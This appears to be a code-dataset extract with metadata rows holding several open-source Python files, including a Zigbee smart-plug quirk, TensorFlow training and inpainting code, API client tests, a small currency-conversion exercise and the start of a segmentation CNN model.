hexsha stringlengths 40 40 | size int64 5 2.06M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 3 248 | max_stars_repo_name stringlengths 5 125 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 248 | max_issues_repo_name stringlengths 5 125 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 248 | max_forks_repo_name stringlengths 5 125 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 5 2.06M | avg_line_length float64 1 1.02M | max_line_length int64 3 1.03M | alphanum_fraction float64 0 1 | count_classes int64 0 1.6M | score_classes float64 0 1 | count_generators int64 0 651k | score_generators float64 0 1 | count_decorators int64 0 990k | score_decorators float64 0 1 | count_async_functions int64 0 235k | score_async_functions float64 0 1 | count_documentation int64 0 1.04M | score_documentation float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
5e10d79ee00b825b54754541f414e0440dc5038c | 4,015 | py | Python | zhaquirks/xiaomi/aqara/plug.py | danielbrunt57/zha-device-handlers | e760d7261f4eff507109ad66b1185f365679a29a | [
"Apache-2.0"
] | null | null | null | zhaquirks/xiaomi/aqara/plug.py | danielbrunt57/zha-device-handlers | e760d7261f4eff507109ad66b1185f365679a29a | [
"Apache-2.0"
] | null | null | null | zhaquirks/xiaomi/aqara/plug.py | danielbrunt57/zha-device-handlers | e760d7261f4eff507109ad66b1185f365679a29a | [
"Apache-2.0"
] | 1 | 2020-11-18T13:14:35.000Z | 2020-11-18T13:14:35.000Z | """Xiaomi lumi.plug plug."""
import logging
from zigpy.profiles import zha
from zigpy.zcl.clusters.general import (
AnalogInput,
Basic,
BinaryOutput,
DeviceTemperature,
Groups,
Identify,
OnOff,
Ota,
PowerConfiguration,
Scenes,
Time,
)
from zhaquirks.xiaomi import (
LUMI,
AnalogInputCluster,
BasicCluster,
ElectricalMeasurementCluster,
XiaomiCustomDevice,
)
from zhaquirks import Bus
from zhaquirks.const import (
DEVICE_TYPE,
ENDPOINTS,
INPUT_CLUSTERS,
MODELS_INFO,
OUTPUT_CLUSTERS,
PROFILE_ID,
SKIP_CONFIGURATION,
)
_LOGGER = logging.getLogger(__name__)
class Plug(XiaomiCustomDevice):
    """Quirk for the Xiaomi lumi.plug smart plug.

    Replaces the stock Zigbee clusters with Xiaomi-specific ones so that
    power/voltage/consumption attribute reports are handled correctly.
    """

    def __init__(self, *args, **kwargs):
        """Init: create the event buses used by the custom clusters to
        relay voltage/consumption/power readings between endpoints."""
        self.voltage_bus = Bus()
        self.consumption_bus = Bus()
        self.power_bus = Bus()
        super().__init__(*args, **kwargs)

    # Signature as reported by the physical device; used to match this quirk.
    signature = {
        MODELS_INFO: [(LUMI, "lumi.plug")],
        ENDPOINTS: {
            # <SimpleDescriptor endpoint=1 profile=260 device_type=81
            # device_version=1
            # input_clusters=[0, 4, 3, 6, 16, 5, 10, 1, 2]
            # output_clusters=[25, 10]>
            1: {
                PROFILE_ID: zha.PROFILE_ID,
                DEVICE_TYPE: zha.DeviceType.SMART_PLUG,
                INPUT_CLUSTERS: [
                    Basic.cluster_id,
                    PowerConfiguration.cluster_id,
                    DeviceTemperature.cluster_id,
                    Groups.cluster_id,
                    Identify.cluster_id,
                    OnOff.cluster_id,
                    Scenes.cluster_id,
                    BinaryOutput.cluster_id,
                    Time.cluster_id,
                ],
                OUTPUT_CLUSTERS: [Ota.cluster_id, Time.cluster_id],
            },
            # <SimpleDescriptor endpoint=2 profile=260 device_type=9
            # device_version=1
            # input_clusters=[12]
            # output_clusters=[12, 4]>
            2: {
                PROFILE_ID: zha.PROFILE_ID,
                DEVICE_TYPE: zha.DeviceType.MAIN_POWER_OUTLET,
                INPUT_CLUSTERS: [AnalogInput.cluster_id],
                OUTPUT_CLUSTERS: [AnalogInput.cluster_id, Groups.cluster_id],
            },
            # <SimpleDescriptor endpoint=3 profile=260 device_type=83
            # device_version=1
            # input_clusters=[12]
            # output_clusters=[12]>
            3: {
                PROFILE_ID: zha.PROFILE_ID,
                DEVICE_TYPE: zha.DeviceType.METER_INTERFACE,
                INPUT_CLUSTERS: [AnalogInput.cluster_id],
                OUTPUT_CLUSTERS: [AnalogInput.cluster_id],
            },
        },
    }

    # Replacement applied by zigpy: endpoint 1 swaps in BasicCluster and the
    # Xiaomi ElectricalMeasurementCluster; endpoint 2 swaps in
    # AnalogInputCluster so instantaneous power reports are parsed.
    replacement = {
        SKIP_CONFIGURATION: True,
        ENDPOINTS: {
            1: {
                PROFILE_ID: zha.PROFILE_ID,
                DEVICE_TYPE: zha.DeviceType.SMART_PLUG,
                INPUT_CLUSTERS: [
                    BasicCluster,
                    PowerConfiguration.cluster_id,
                    DeviceTemperature.cluster_id,
                    Groups.cluster_id,
                    Identify.cluster_id,
                    OnOff.cluster_id,
                    Scenes.cluster_id,
                    BinaryOutput.cluster_id,
                    Time.cluster_id,
                    ElectricalMeasurementCluster,
                ],
                OUTPUT_CLUSTERS: [Ota.cluster_id, Time.cluster_id],
            },
            2: {
                PROFILE_ID: zha.PROFILE_ID,
                DEVICE_TYPE: zha.DeviceType.MAIN_POWER_OUTLET,
                INPUT_CLUSTERS: [AnalogInputCluster],
                OUTPUT_CLUSTERS: [AnalogInput.cluster_id, Groups.cluster_id],
            },
            3: {
                PROFILE_ID: zha.PROFILE_ID,
                DEVICE_TYPE: zha.DeviceType.METER_INTERFACE,
                INPUT_CLUSTERS: [AnalogInput.cluster_id],
                OUTPUT_CLUSTERS: [AnalogInput.cluster_id],
            },
        },
    }
| 31.124031 | 77 | 0.534994 | 3,361 | 0.837111 | 0 | 0 | 0 | 0 | 0 | 0 | 459 | 0.114321 |
5e12c134d94ad9be780e1e0c73e68d0648224d24 | 5,193 | py | Python | learners/fully_observed_learner.py | Aaron-Jin-Xu/probabilistic-semantic-image-inpainting | 8ce630eaf7e8f9ef5fc5ad19d5474d050d71807d | [
"MIT"
] | 1 | 2020-04-19T22:48:25.000Z | 2020-04-19T22:48:25.000Z | learners/fully_observed_learner.py | Aaron-Jin-Xu/probabilistic-semantic-image-inpainting | 8ce630eaf7e8f9ef5fc5ad19d5474d050d71807d | [
"MIT"
] | null | null | null | learners/fully_observed_learner.py | Aaron-Jin-Xu/probabilistic-semantic-image-inpainting | 8ce630eaf7e8f9ef5fc5ad19d5474d050d71807d | [
"MIT"
] | null | null | null | import os
import sys
import json
import time
import numpy as np
import tensorflow as tf
from blocks.helpers import Monitor
from blocks.helpers import visualize_samples, get_nonlinearity, int_shape, get_trainable_variables, broadcast_masks_np
from blocks.optimizers import adam_updates
import data.load_data as load_data
from masks import get_generator
from .learner import Learner
class FullyObservedLearner(Learner):
    """Learner trained on fully observed images.

    The model receives an image plus a mask (from a mask generator `mgen`)
    and reconstructs the image; `sample` performs pixel-by-pixel
    autoregressive inpainting of the masked region.
    NOTE(review): relies on attributes from the Learner base class
    (self.models, self.sess, self.train_set, self.num_channels, ...) --
    not visible here, confirm against learner.py.
    """

    def __init__(self, nr_gpu, save_dir, img_size, exp_name="default"):
        super().__init__(nr_gpu, save_dir, img_size, exp_name)

    def train_epoch(self, mgen, which_set='train'):
        """Run one training pass over `which_set`, one optimizer step per batch."""
        if which_set == 'train':
            data_set = self.train_set
        elif which_set == 'eval':
            data_set = self.eval_set
        elif which_set == 'test':
            data_set = self.test_set
        for data in data_set:
            if self.num_channels == 3:
                # scale RGB from [0, 255] to [-1, 1]
                # NOTE(review): np.cast is a deprecated NumPy alias table.
                data = np.cast[np.float32]((data - 127.5) / 127.5)
            # split the batch across GPUs, one model replica per GPU
            ds = np.split(data, self.nr_gpu)
            feed_dict = {}
            feed_dict.update({model.is_training: True for model in self.models})
            feed_dict.update({model.dropout_p: 0.5 for model in self.models})
            feed_dict.update({model.x: ds[i] for i, model in enumerate(self.models)})
            feed_dict.update({model.x_bar: ds[i] for i, model in enumerate(self.models)})
            # a fresh random mask per GPU shard
            masks_np = [mgen.gen(self.batch_size//self.nr_gpu) for i in range(self.nr_gpu)]
            feed_dict.update({model.masks: masks_np[i] for i, model in enumerate(self.models)})
            self.sess.run(self.train_step, feed_dict=feed_dict)

    def eval_epoch(self, mgen, which_set='eval'):
        """Same feed as train_epoch but with dropout off; results go to self.monitor."""
        if which_set == 'train':
            data_set = self.train_set
        elif which_set == 'eval':
            data_set = self.eval_set
        elif which_set == 'test':
            data_set = self.test_set
        for data in data_set:
            if self.num_channels == 3:
                data = np.cast[np.float32]((data - 127.5) / 127.5)
            ds = np.split(data, self.nr_gpu)
            feed_dict = {}
            feed_dict.update({model.is_training: False for model in self.models})
            feed_dict.update({model.dropout_p: 0.0 for model in self.models})
            feed_dict.update({model.x: ds[i] for i, model in enumerate(self.models)})
            feed_dict.update({model.x_bar: ds[i] for i, model in enumerate(self.models)})
            masks_np = [mgen.gen(self.batch_size//self.nr_gpu) for i in range(self.nr_gpu)]
            feed_dict.update({model.masks: masks_np[i] for i, model in enumerate(self.models)})
            self.monitor.evaluate(self.sess, feed_dict)

    def sample(self, data, mgen, same_inputs=False, use_mask_at=None):
        """Inpaint the masked pixels of `data` autoregressively.

        same_inputs -- repeat one image/mask across the whole batch.
        use_mask_at -- path to a saved .npz of masks; otherwise new masks
                       are generated and saved.
        Returns (original, masked, generated) image batches.
        """
        if self.num_channels == 3:
            data = np.cast[np.float32]((data - 127.5) / 127.5)
        if same_inputs:
            # copy image at index 3 over the whole batch (assumes batch >= 4)
            for i in range(data.shape[0]):
                data[i] = data[3]
        ori_data = data.copy()
        ds = np.split(data.copy(), self.nr_gpu)
        feed_dict = {}
        feed_dict.update({model.is_training: False for model in self.models})
        feed_dict.update({model.dropout_p: 0.0 for model in self.models})
        feed_dict.update({model.x: ds[i] for i, model in enumerate(self.models)})
        feed_dict.update({model.x_bar: ds[i] for i, model in enumerate(self.models)})
        if use_mask_at is not None:
            masks_np = np.load(use_mask_at)['masks']
            masks_np = np.split(masks_np, self.nr_gpu)
        else:
            masks_np = [mgen.gen(self.batch_size//self.nr_gpu) for i in range(self.nr_gpu)]
            # persist the masks so the run is reproducible
            np.savez(mgen.name+"_"+self.data_set, masks=np.concatenate(masks_np))
        if same_inputs:
            for g in range(self.nr_gpu):
                for i in range(self.batch_size//self.nr_gpu):
                    masks_np[g][i] = masks_np[0][0]
        feed_dict.update({model.masks: masks_np[i] for i, model in enumerate(self.models)})
        #
        # zero out the masked pixels of the network input
        for i in range(self.nr_gpu):
            ds[i] *= broadcast_masks_np(masks_np[i], num_channels=self.num_channels)
        masked_data = np.concatenate(ds, axis=0)
        x_gen = [ds[i].copy() for i in range(self.nr_gpu)]
        # raster-scan over pixels; fill only positions masked on some GPU
        for yi in range(self.img_size):
            for xi in range(self.img_size):
                if np.min(np.array([masks_np[i][:, yi, xi] for i in range(self.nr_gpu)])) > 0:
                    continue
                feed_dict.update({model.x_bar:x_gen[i] for i, model in enumerate(self.models)})
                x_hats = self.sess.run([model.x_hat for model in self.models], feed_dict=feed_dict)
                for i in range(self.nr_gpu):
                    # keep observed pixels (mask==1), take predictions elsewhere
                    bmask = broadcast_masks_np(masks_np[i][:, yi, xi] , num_channels=self.num_channels)
                    x_gen[i][:, yi, xi, :] = x_hats[i][:, yi, xi, :] * (1.-bmask) + x_gen[i][:, yi, xi, :] * bmask
        gen_data = np.concatenate(x_gen, axis=0)
        if self.num_channels == 1:
            # grayscale only: tint the hidden region for visualization
            masks_np = np.concatenate(masks_np, axis=0)
            masks_np = broadcast_masks_np(masks_np, num_channels=self.num_channels)
            masked_data += (1-masks_np) * 0.5
        return ori_data, masked_data, gen_data
| 48.53271 | 118 | 0.613133 | 4,810 | 0.926247 | 0 | 0 | 0 | 0 | 0 | 0 | 71 | 0.013672 |
5e13ce9974225da3573940cfb2a5a693b633e821 | 993 | py | Python | tests/unit/test_source/test_sourcebase.py | rbogdanoff/reactiveaws | 3a4107dd4ade26792f79fecbb4d1e783e4e2580f | [
"Apache-2.0"
] | null | null | null | tests/unit/test_source/test_sourcebase.py | rbogdanoff/reactiveaws | 3a4107dd4ade26792f79fecbb4d1e783e4e2580f | [
"Apache-2.0"
] | null | null | null | tests/unit/test_source/test_sourcebase.py | rbogdanoff/reactiveaws | 3a4107dd4ade26792f79fecbb4d1e783e4e2580f | [
"Apache-2.0"
] | null | null | null | from nose.tools import *
from unittest.mock import patch, Mock
from rxaws.source.sourcebase import SourceBase
from botocore.client import BaseClient
# NOTE(review): this deliberately shadows botocore.client.BaseClient imported
# above, so the isinstance check in the tests matches this Mock subclass.
class BaseClient(Mock):
    """Mock stand-in for botocore's BaseClient; records calls, does nothing."""
class TestSourceBase:
    """Unit tests for SourceBase construction with boto3 mocked out."""

    # inject the mock BaseClient in place of the real boto3 client
    @patch('boto3.client', return_value=(BaseClient()))
    # mock the get_source_iterable abstractmethod
    # @patch.multiple(SourceBase, __abstractmethods__=set(), execute=Mock(return_value=[1,2,3]))
    def setup(self, mock_return_value):
        """Create a fresh instance of the class under test before each test."""
        # create instance of class under test
        self.cut_sourcebase = SourceBase()

    def teardown(self):
        pass

    def test_sourcebase_create(self):
        # when a new SourceBase instance is created
        # it should contain an aws client
        assert self.cut_sourcebase.conn is not None
        assert isinstance(self.cut_sourcebase.conn, BaseClient) is True, \
            'expected BaseClient got: %s' % type(self.cut_sourcebase.conn)
| 35.464286 | 95 | 0.712991 | 839 | 0.844914 | 0 | 0 | 0 | 0 | 0 | 0 | 374 | 0.376636 |
5e15026007a09207c6424778c0b96d54f0620c12 | 1,725 | py | Python | tests/events/events_client_test.py | riaz-bordie-cko/checkout-sdk-python | d9bc073306c1a98544c326be693ed722576ea895 | [
"MIT"
] | null | null | null | tests/events/events_client_test.py | riaz-bordie-cko/checkout-sdk-python | d9bc073306c1a98544c326be693ed722576ea895 | [
"MIT"
] | null | null | null | tests/events/events_client_test.py | riaz-bordie-cko/checkout-sdk-python | d9bc073306c1a98544c326be693ed722576ea895 | [
"MIT"
] | null | null | null | import pytest
from checkout_sdk.events.events import RetrieveEventsRequest
from checkout_sdk.events.events_client import EventsClient
@pytest.fixture(scope='class')
def client(mock_sdk_configuration, mock_api_client):
    """Class-scoped EventsClient wired to a mocked API client and configuration."""
    return EventsClient(api_client=mock_api_client, configuration=mock_sdk_configuration)
class TestEventsClient:
    """Each test patches the underlying ApiClient HTTP verb and asserts the
    EventsClient method returns the patched value unchanged (i.e. it simply
    delegates to the API client)."""

    def test_retrieve_all_event_types(self, mocker, client: EventsClient):
        mocker.patch('checkout_sdk.api_client.ApiClient.get', return_value='response')
        assert client.retrieve_all_event_types() == 'response'

    def test_retrieve_events(self, mocker, client: EventsClient):
        mocker.patch('checkout_sdk.api_client.ApiClient.get', return_value='response')
        assert client.retrieve_events(RetrieveEventsRequest()) == 'response'

    def test_retrieve_event(self, mocker, client: EventsClient):
        mocker.patch('checkout_sdk.api_client.ApiClient.get', return_value='response')
        assert client.retrieve_event('event_id') == 'response'

    def test_retrieve_event_notification(self, mocker, client: EventsClient):
        mocker.patch('checkout_sdk.api_client.ApiClient.get', return_value='response')
        assert client.retrieve_event_notification('event_id', 'notification_id') == 'response'

    def test_retry_webhook(self, mocker, client: EventsClient):
        mocker.patch('checkout_sdk.api_client.ApiClient.post', return_value='response')
        assert client.retry_webhook('event_id', 'webhook_id') == 'response'

    def test_retry_all_webhooks(self, mocker, client: EventsClient):
        mocker.patch('checkout_sdk.api_client.ApiClient.post', return_value='response')
        assert client.retry_all_webhooks('event_id') == 'response'
| 46.621622 | 94 | 0.762899 | 1,411 | 0.817971 | 0 | 0 | 173 | 0.10029 | 0 | 0 | 432 | 0.250435 |
5e15898d023ea4288e326bb8421789a0314d64e1 | 9,261 | py | Python | vectornet/trainer.py | chickenfingerwu/pytorch-CycleGAN-and-pix2pix | 367033f7d265fc7307ed0c917a4f8d19b298e6b7 | [
"BSD-3-Clause"
] | null | null | null | vectornet/trainer.py | chickenfingerwu/pytorch-CycleGAN-and-pix2pix | 367033f7d265fc7307ed0c917a4f8d19b298e6b7 | [
"BSD-3-Clause"
] | null | null | null | vectornet/trainer.py | chickenfingerwu/pytorch-CycleGAN-and-pix2pix | 367033f7d265fc7307ed0c917a4f8d19b298e6b7 | [
"BSD-3-Clause"
] | null | null | null | from __future__ import print_function
import os
import numpy as np
from tqdm import trange
from models import *
from utils import save_image
class Trainer(object):
    """TF1-style trainer for a VDSR model: builds the graph in __init__/
    build_model, runs the optimization loop in train, and renders samples
    in generate. Uses a tf.train.Supervisor-managed session (TF1 API)."""

    def __init__(self, config, batch_manager):
        """Wire up config, placeholders, the model graph, and the session."""
        tf.compat.v1.set_random_seed(config.random_seed)
        self.config = config
        self.batch_manager = batch_manager
        # training tensors come from the batch queue; xt/yt are fed at test time
        self.x, self.y = batch_manager.batch()
        self.xt =tf.compat.v1.placeholder(tf.float32, shape=int_shape(self.x))
        self.yt =tf.compat.v1.placeholder(tf.float32, shape=int_shape(self.y))
        self.dataset = config.dataset
        self.beta1 = config.beta1
        self.beta2 = config.beta2
        self.optimizer = config.optimizer
        self.batch_size = config.batch_size
        # learning rate is a variable so it can be decayed via lr_update
        self.lr = tf.Variable(config.lr, name='lr')
        self.lr_update = tf.assign(self.lr, tf.maximum(self.lr*0.1, config.lr_lower_boundary), name='lr_update')
        self.height = config.height
        self.width = config.width
        self.b_num = config.batch_size
        self.conv_hidden_num = config.conv_hidden_num
        self.repeat_num = config.repeat_num
        self.use_l2 = config.use_l2
        self.use_norm = config.use_norm
        self.model_dir = config.model_dir
        self.use_gpu = config.use_gpu
        self.data_format = config.data_format
        if self.data_format == 'NCHW':
            self.x = nhwc_to_nchw(self.x)
            self.y = nhwc_to_nchw(self.y)
            self.xt = nhwc_to_nchw(self.xt)
            self.yt = nhwc_to_nchw(self.yt)
        self.start_step = config.start_step
        self.log_step = config.log_step
        self.test_step = config.test_step
        self.max_step = config.max_step
        self.save_sec = config.save_sec
        self.lr_update_step = config.lr_update_step
        self.step = tf.Variable(self.start_step, name='step', trainable=False)
        self.is_train = config.is_train
        self.build_model()
        self.saver = tf.compat.v1.train.Saver()
        self.summary_writer = tf.summary.FileWriter(self.model_dir)
        # Supervisor handles checkpointing/recovery (legacy TF1 API)
        sv = tf.train.Supervisor(logdir=self.model_dir,
                                is_chief=True,
                                saver=self.saver,
                                summary_op=None,
                                summary_writer=self.summary_writer,
                                save_model_secs=self.save_sec,
                                global_step=self.step,
                                ready_for_local_init_op=None)
        gpu_options = tf.compat.v1.GPUOptions(allow_growth=True)
        sess_config = tf.compat.v1.ConfigProto(allow_soft_placement=True,
                                    gpu_options=gpu_options)
        self.sess = sv.prepare_or_wait_for_session(config=sess_config)
        if self.is_train:
            self.batch_manager.start_thread(self.sess)

    def build_model(self):
        """Build the VDSR train/test graphs, losses, optimizer and summaries."""
        self.y_, self.var = VDSR(
            self.x, self.conv_hidden_num, self.repeat_num, self.data_format, self.use_norm)
        self.y_img = denorm_img(self.y_, self.data_format) # for debug
        # second instantiation reuses weights for test-time inference
        self.yt_, _ = VDSR(
            self.xt, self.conv_hidden_num, self.repeat_num, self.data_format, self.use_norm,
            train=False, reuse=True)
        self.yt_ = tf.clip_by_value(self.yt_, 0, 1)
        self.yt_img = denorm_img(self.yt_, self.data_format)
        show_all_variables()
        if self.optimizer == 'adam':
            optimizer = tf.train.AdamOptimizer
        else:
            raise Exception("[!] Caution! Paper didn't use {} opimizer other than Adam".format(self.config.optimizer))
        optimizer = optimizer(self.lr, beta1=self.beta1, beta2=self.beta2)
        # losses
        # l1 and l2
        self.loss_l1 = tf.reduce_mean(tf.abs(self.y_ - self.y))
        self.loss_l2 = tf.reduce_mean(tf.squared_difference(self.y_, self.y))
        # total
        if self.use_l2:
            self.loss = self.loss_l2
        else:
            self.loss = self.loss_l1
        # test loss (reported as 1 - error, i.e. an "accuracy")
        self.tl1 = 1 - tf.reduce_mean(tf.abs(self.yt_ - self.yt))
        self.tl2 = 1 - tf.reduce_mean(tf.squared_difference(self.yt_, self.yt))
        self.test_acc_l1 =tf.compat.v1.placeholder(tf.float32)
        self.test_acc_l2 =tf.compat.v1.placeholder(tf.float32)
        self.test_acc_iou =tf.compat.v1.placeholder(tf.float32)
        self.optim = optimizer.minimize(self.loss, global_step=self.step, var_list=self.var)
        summary = [
            tf.summary.image("y", self.y_img),
            tf.summary.scalar("loss/loss", self.loss),
            tf.summary.scalar("loss/loss_l1", self.loss_l1),
            tf.summary.scalar("loss/loss_l2", self.loss_l2),
            tf.summary.scalar("misc/lr", self.lr),
            tf.summary.scalar('misc/q', self.batch_manager.q.size())
        ]
        self.summary_op = tf.summary.merge(summary)
        summary = [
            tf.summary.image("x_sample", denorm_img(self.x, self.data_format)),
            tf.summary.image("y_sample", denorm_img(self.y, self.data_format)),
        ]
        self.summary_once = tf.summary.merge(summary) # call just once
        summary = [
            tf.summary.scalar("loss/test_acc_l1", self.test_acc_l1),
            tf.summary.scalar("loss/test_acc_l2", self.test_acc_l2),
            tf.summary.scalar("loss/test_acc_iou", self.test_acc_iou),
        ]
        self.summary_test = tf.summary.merge(summary)

    def train(self):
        """Main optimization loop with periodic test evaluation and sampling."""
        x_list, xs, ys, sample_list = self.batch_manager.random_list(self.b_num)
        save_image(xs, '{}/x_gt.png'.format(self.model_dir))
        save_image(ys, '{}/y_gt.png'.format(self.model_dir))
        with open('{}/gt.txt'.format(self.model_dir), 'w') as f:
            for sample in sample_list:
                f.write(sample + '\n')
        # call once
        summary_once = self.sess.run(self.summary_once)
        self.summary_writer.add_summary(summary_once, 0)
        self.summary_writer.flush()
        for step in trange(self.start_step, self.max_step):
            fetch_dict = {
                "optim": self.optim,
                "loss": self.loss,
            }
            if step % self.log_step == 0 or step == self.max_step-1:
                fetch_dict.update({
                    "summary": self.summary_op,
                })
            # if step % self.test_step == self.test_step-1 or step == self.max_step-1:
            # NOTE(review): the periodic guard above is commented out, so the
            # full test-set evaluation runs EVERY step -- looks like a debug
            # change left in; confirm before relying on training speed.
            if True:
                l1, l2, iou, nb = 0, 0, 0, 0
                for x, y in self.batch_manager.test_batch():
                    if self.data_format == 'NCHW':
                        x = to_nchw_numpy(x)
                        y = to_nchw_numpy(y)
                    tl1, tl2, y_ = self.sess.run([self.tl1, self.tl2, self.yt_], {self.xt: x, self.yt: y})
                    l1 += tl1
                    l2 += tl2
                    nb += 1
                    # iou
                    y_I = np.logical_and(y>0, y_>0)
                    y_I_sum = np.sum(y_I, axis=(1, 2, 3))
                    y_U = np.logical_or(y>0, y_>0)
                    y_U_sum = np.sum(y_U, axis=(1, 2, 3))
                    # print(y_I_sum, y_U_sum)
                    nonzero_id = np.where(y_U_sum != 0)[0]
                    if nonzero_id.shape[0] == 0:
                        acc = 1.0
                    else:
                        acc = np.average(y_I_sum[nonzero_id] / y_U_sum[nonzero_id])
                    iou += acc
                    if nb > 500:
                        break
                l1 /= float(nb)
                l2 /= float(nb)
                iou /= float(nb)
                summary_test = self.sess.run(self.summary_test,
                                            {self.test_acc_l1: l1, self.test_acc_l2: l2, self.test_acc_iou: iou})
                self.summary_writer.add_summary(summary_test, step)
                self.summary_writer.flush()
            result = self.sess.run(fetch_dict)
            if step % self.log_step == 0 or step == self.max_step-1:
                self.summary_writer.add_summary(result['summary'], step)
                self.summary_writer.flush()
                loss = result['loss']
                assert not np.isnan(loss), 'Model diverged with loss = NaN'
                print("\n[{}/{}] Loss: {:.6f}".format(step, self.max_step, loss))
            if step % (self.log_step * 10) == 0 or step == self.max_step-1:
                self.generate(x_list, self.model_dir, idx=step)
            if step % self.lr_update_step == self.lr_update_step - 1:
                self.sess.run(self.lr_update)
        # save last checkpoint..
        save_path = os.path.join(self.model_dir, 'model.ckpt')
        self.saver.save(self.sess, save_path, global_step=self.step)
        self.batch_manager.stop_thread()

    def generate(self, x_samples, root_path=None, idx=None):
        """Run test-time inference on x_samples and save the result image."""
        if self.data_format == 'NCHW':
            x_samples = to_nchw_numpy(x_samples)
        generated = self.sess.run(self.yt_img, {self.xt: x_samples})
        y_path = os.path.join(root_path, 'y_{}.png'.format(idx))
        save_image(generated, y_path, nrow=self.b_num)
print("[*] Samples saved: {}".format(y_path)) | 39.241525 | 118 | 0.563546 | 9,117 | 0.984451 | 0 | 0 | 0 | 0 | 0 | 0 | 623 | 0.067271 |
5e15921eff92f5c9d6be850512491ee049db1643 | 188 | py | Python | Exercicios/010.py | sleepinhoo/Python | d8ac7f3297f3a99b27b07d7341a16503a64124b0 | [
"MIT"
] | null | null | null | Exercicios/010.py | sleepinhoo/Python | d8ac7f3297f3a99b27b07d7341a16503a64124b0 | [
"MIT"
] | null | null | null | Exercicios/010.py | sleepinhoo/Python | d8ac7f3297f3a99b27b07d7341a16503a64124b0 | [
"MIT"
] | null | null | null | grana = float(input("Informe a quantidade de dinherio: R$"))
# Fixed exchange rate (BRL per USD); `grana` (the BRL amount) is read above.
dolar = 5.4
print(f" Dá pra comprar USS${grana / dolar} com o valor atual na sua carteira")
print(f"Cotação usada: {dolar}")
| 26.857143 | 79 | 0.702128 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 138 | 0.722513 |
5e16653f23f402e0f2a6b24312399977f5a75d4f | 210 | py | Python | src/11/zero_copy_sending_and_receiving_of_large_arrays/server.py | tuanavu/python-gitbook | 948a05e065b0f40afbfd22f697dff16238163cde | [
"MIT"
] | 14 | 2017-05-20T04:06:46.000Z | 2022-01-23T06:48:45.000Z | src/11/zero_copy_sending_and_receiving_of_large_arrays/server.py | tuanavu/python-gitbook | 948a05e065b0f40afbfd22f697dff16238163cde | [
"MIT"
] | 1 | 2021-06-10T20:17:55.000Z | 2021-06-10T20:17:55.000Z | src/11/zero_copy_sending_and_receiving_of_large_arrays/server.py | tuanavu/python-gitbook | 948a05e065b0f40afbfd22f697dff16238163cde | [
"MIT"
] | 15 | 2017-03-29T17:57:33.000Z | 2021-08-24T02:20:08.000Z | from zerocopy import send_from
from socket import *
# Zero-copy sender: accept one TCP connection on port 25000 and stream a
# large numpy array to it via send_from (zerocopy module).
s = socket(AF_INET, SOCK_STREAM)
s.bind(('', 25000))
s.listen(1)
c,a = s.accept()
import numpy
# NOTE(review): `a` (the peer address returned by accept) is overwritten here.
a = numpy.arange(0.0, 50000000.0)
send_from(a, c)
c.close()
| 15 | 33 | 0.695238 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 | 0.009524 |
5e16ad16c7c3a0ea076e3bd752e1db8ba4d1da1c | 22,168 | py | Python | YNet/stage2/Model.py | cancertech/-cancer_diagnosis | caa371e64e52be71a85f9a73baa6b518b28cc166 | [
"MIT"
] | 126 | 2018-06-06T01:33:28.000Z | 2022-03-18T01:48:56.000Z | YNet/stage2/Model.py | cancertech/-cancer_diagnosis | caa371e64e52be71a85f9a73baa6b518b28cc166 | [
"MIT"
] | 13 | 2018-07-26T13:49:56.000Z | 2021-04-20T07:44:47.000Z | YNet/stage2/Model.py | cancertech/-cancer_diagnosis | caa371e64e52be71a85f9a73baa6b518b28cc166 | [
"MIT"
] | 32 | 2018-06-06T01:20:03.000Z | 2022-03-18T02:52:53.000Z | #
# author: Sachin Mehta
# Project Description: This repository contains source code for semantically segmenting WSIs; however, it could be easily
# adapted for other domains such as natural image segmentation
# File Description: This file contains the CNN models
# ==============================================================================
import torch
import torch.nn as nn
class CBR(nn.Module):
    """Conv2d -> BatchNorm2d -> ReLU block with 'same' padding (at stride 1)."""

    def __init__(self, nIn, nOut, kSize, stride=1):
        super().__init__()
        pad = int((kSize - 1) / 2)
        self.conv = nn.Conv2d(nIn, nOut, kSize, stride=stride, padding=pad, bias=False)
        self.bn = nn.BatchNorm2d(nOut, momentum=0.95, eps=1e-03)
        self.act = nn.ReLU(True)

    def forward(self, input):
        # conv -> batch-norm -> in-place ReLU
        return self.act(self.bn(self.conv(input)))
class CB(nn.Module):
    """Conv2d followed by BatchNorm2d (no activation), with 'same' padding."""

    def __init__(self, nIn, nOut, kSize, stride=1):
        super().__init__()
        pad = int((kSize - 1) / 2)
        self.conv = nn.Conv2d(nIn, nOut, kSize, stride=stride, padding=pad, bias=False)
        self.bn = nn.BatchNorm2d(nOut, momentum=0.95, eps=1e-03)

    def forward(self, input):
        return self.bn(self.conv(input))
class C(nn.Module):
    """Plain bias-free Conv2d with 'same' padding (at stride 1)."""

    def __init__(self, nIn, nOut, kSize, stride=1):
        super().__init__()
        pad = int((kSize - 1) / 2)
        self.conv = nn.Conv2d(nIn, nOut, kSize, stride=stride, padding=pad, bias=False)

    def forward(self, input):
        return self.conv(input)
class DownSampler(nn.Module):
    """Halve spatial size by concatenating a strided 3x3 conv (nOut - nIn
    channels) with 3x3 average pooling (nIn channels), then BN + ReLU."""

    def __init__(self, nIn, nOut):
        super().__init__()
        self.conv = nn.Conv2d(nIn, nOut - nIn, 3, stride=2, padding=1, bias=False)
        self.pool = nn.AvgPool2d(3, stride=2, padding=1)
        self.bn = nn.BatchNorm2d(nOut, momentum=0.95, eps=1e-3)
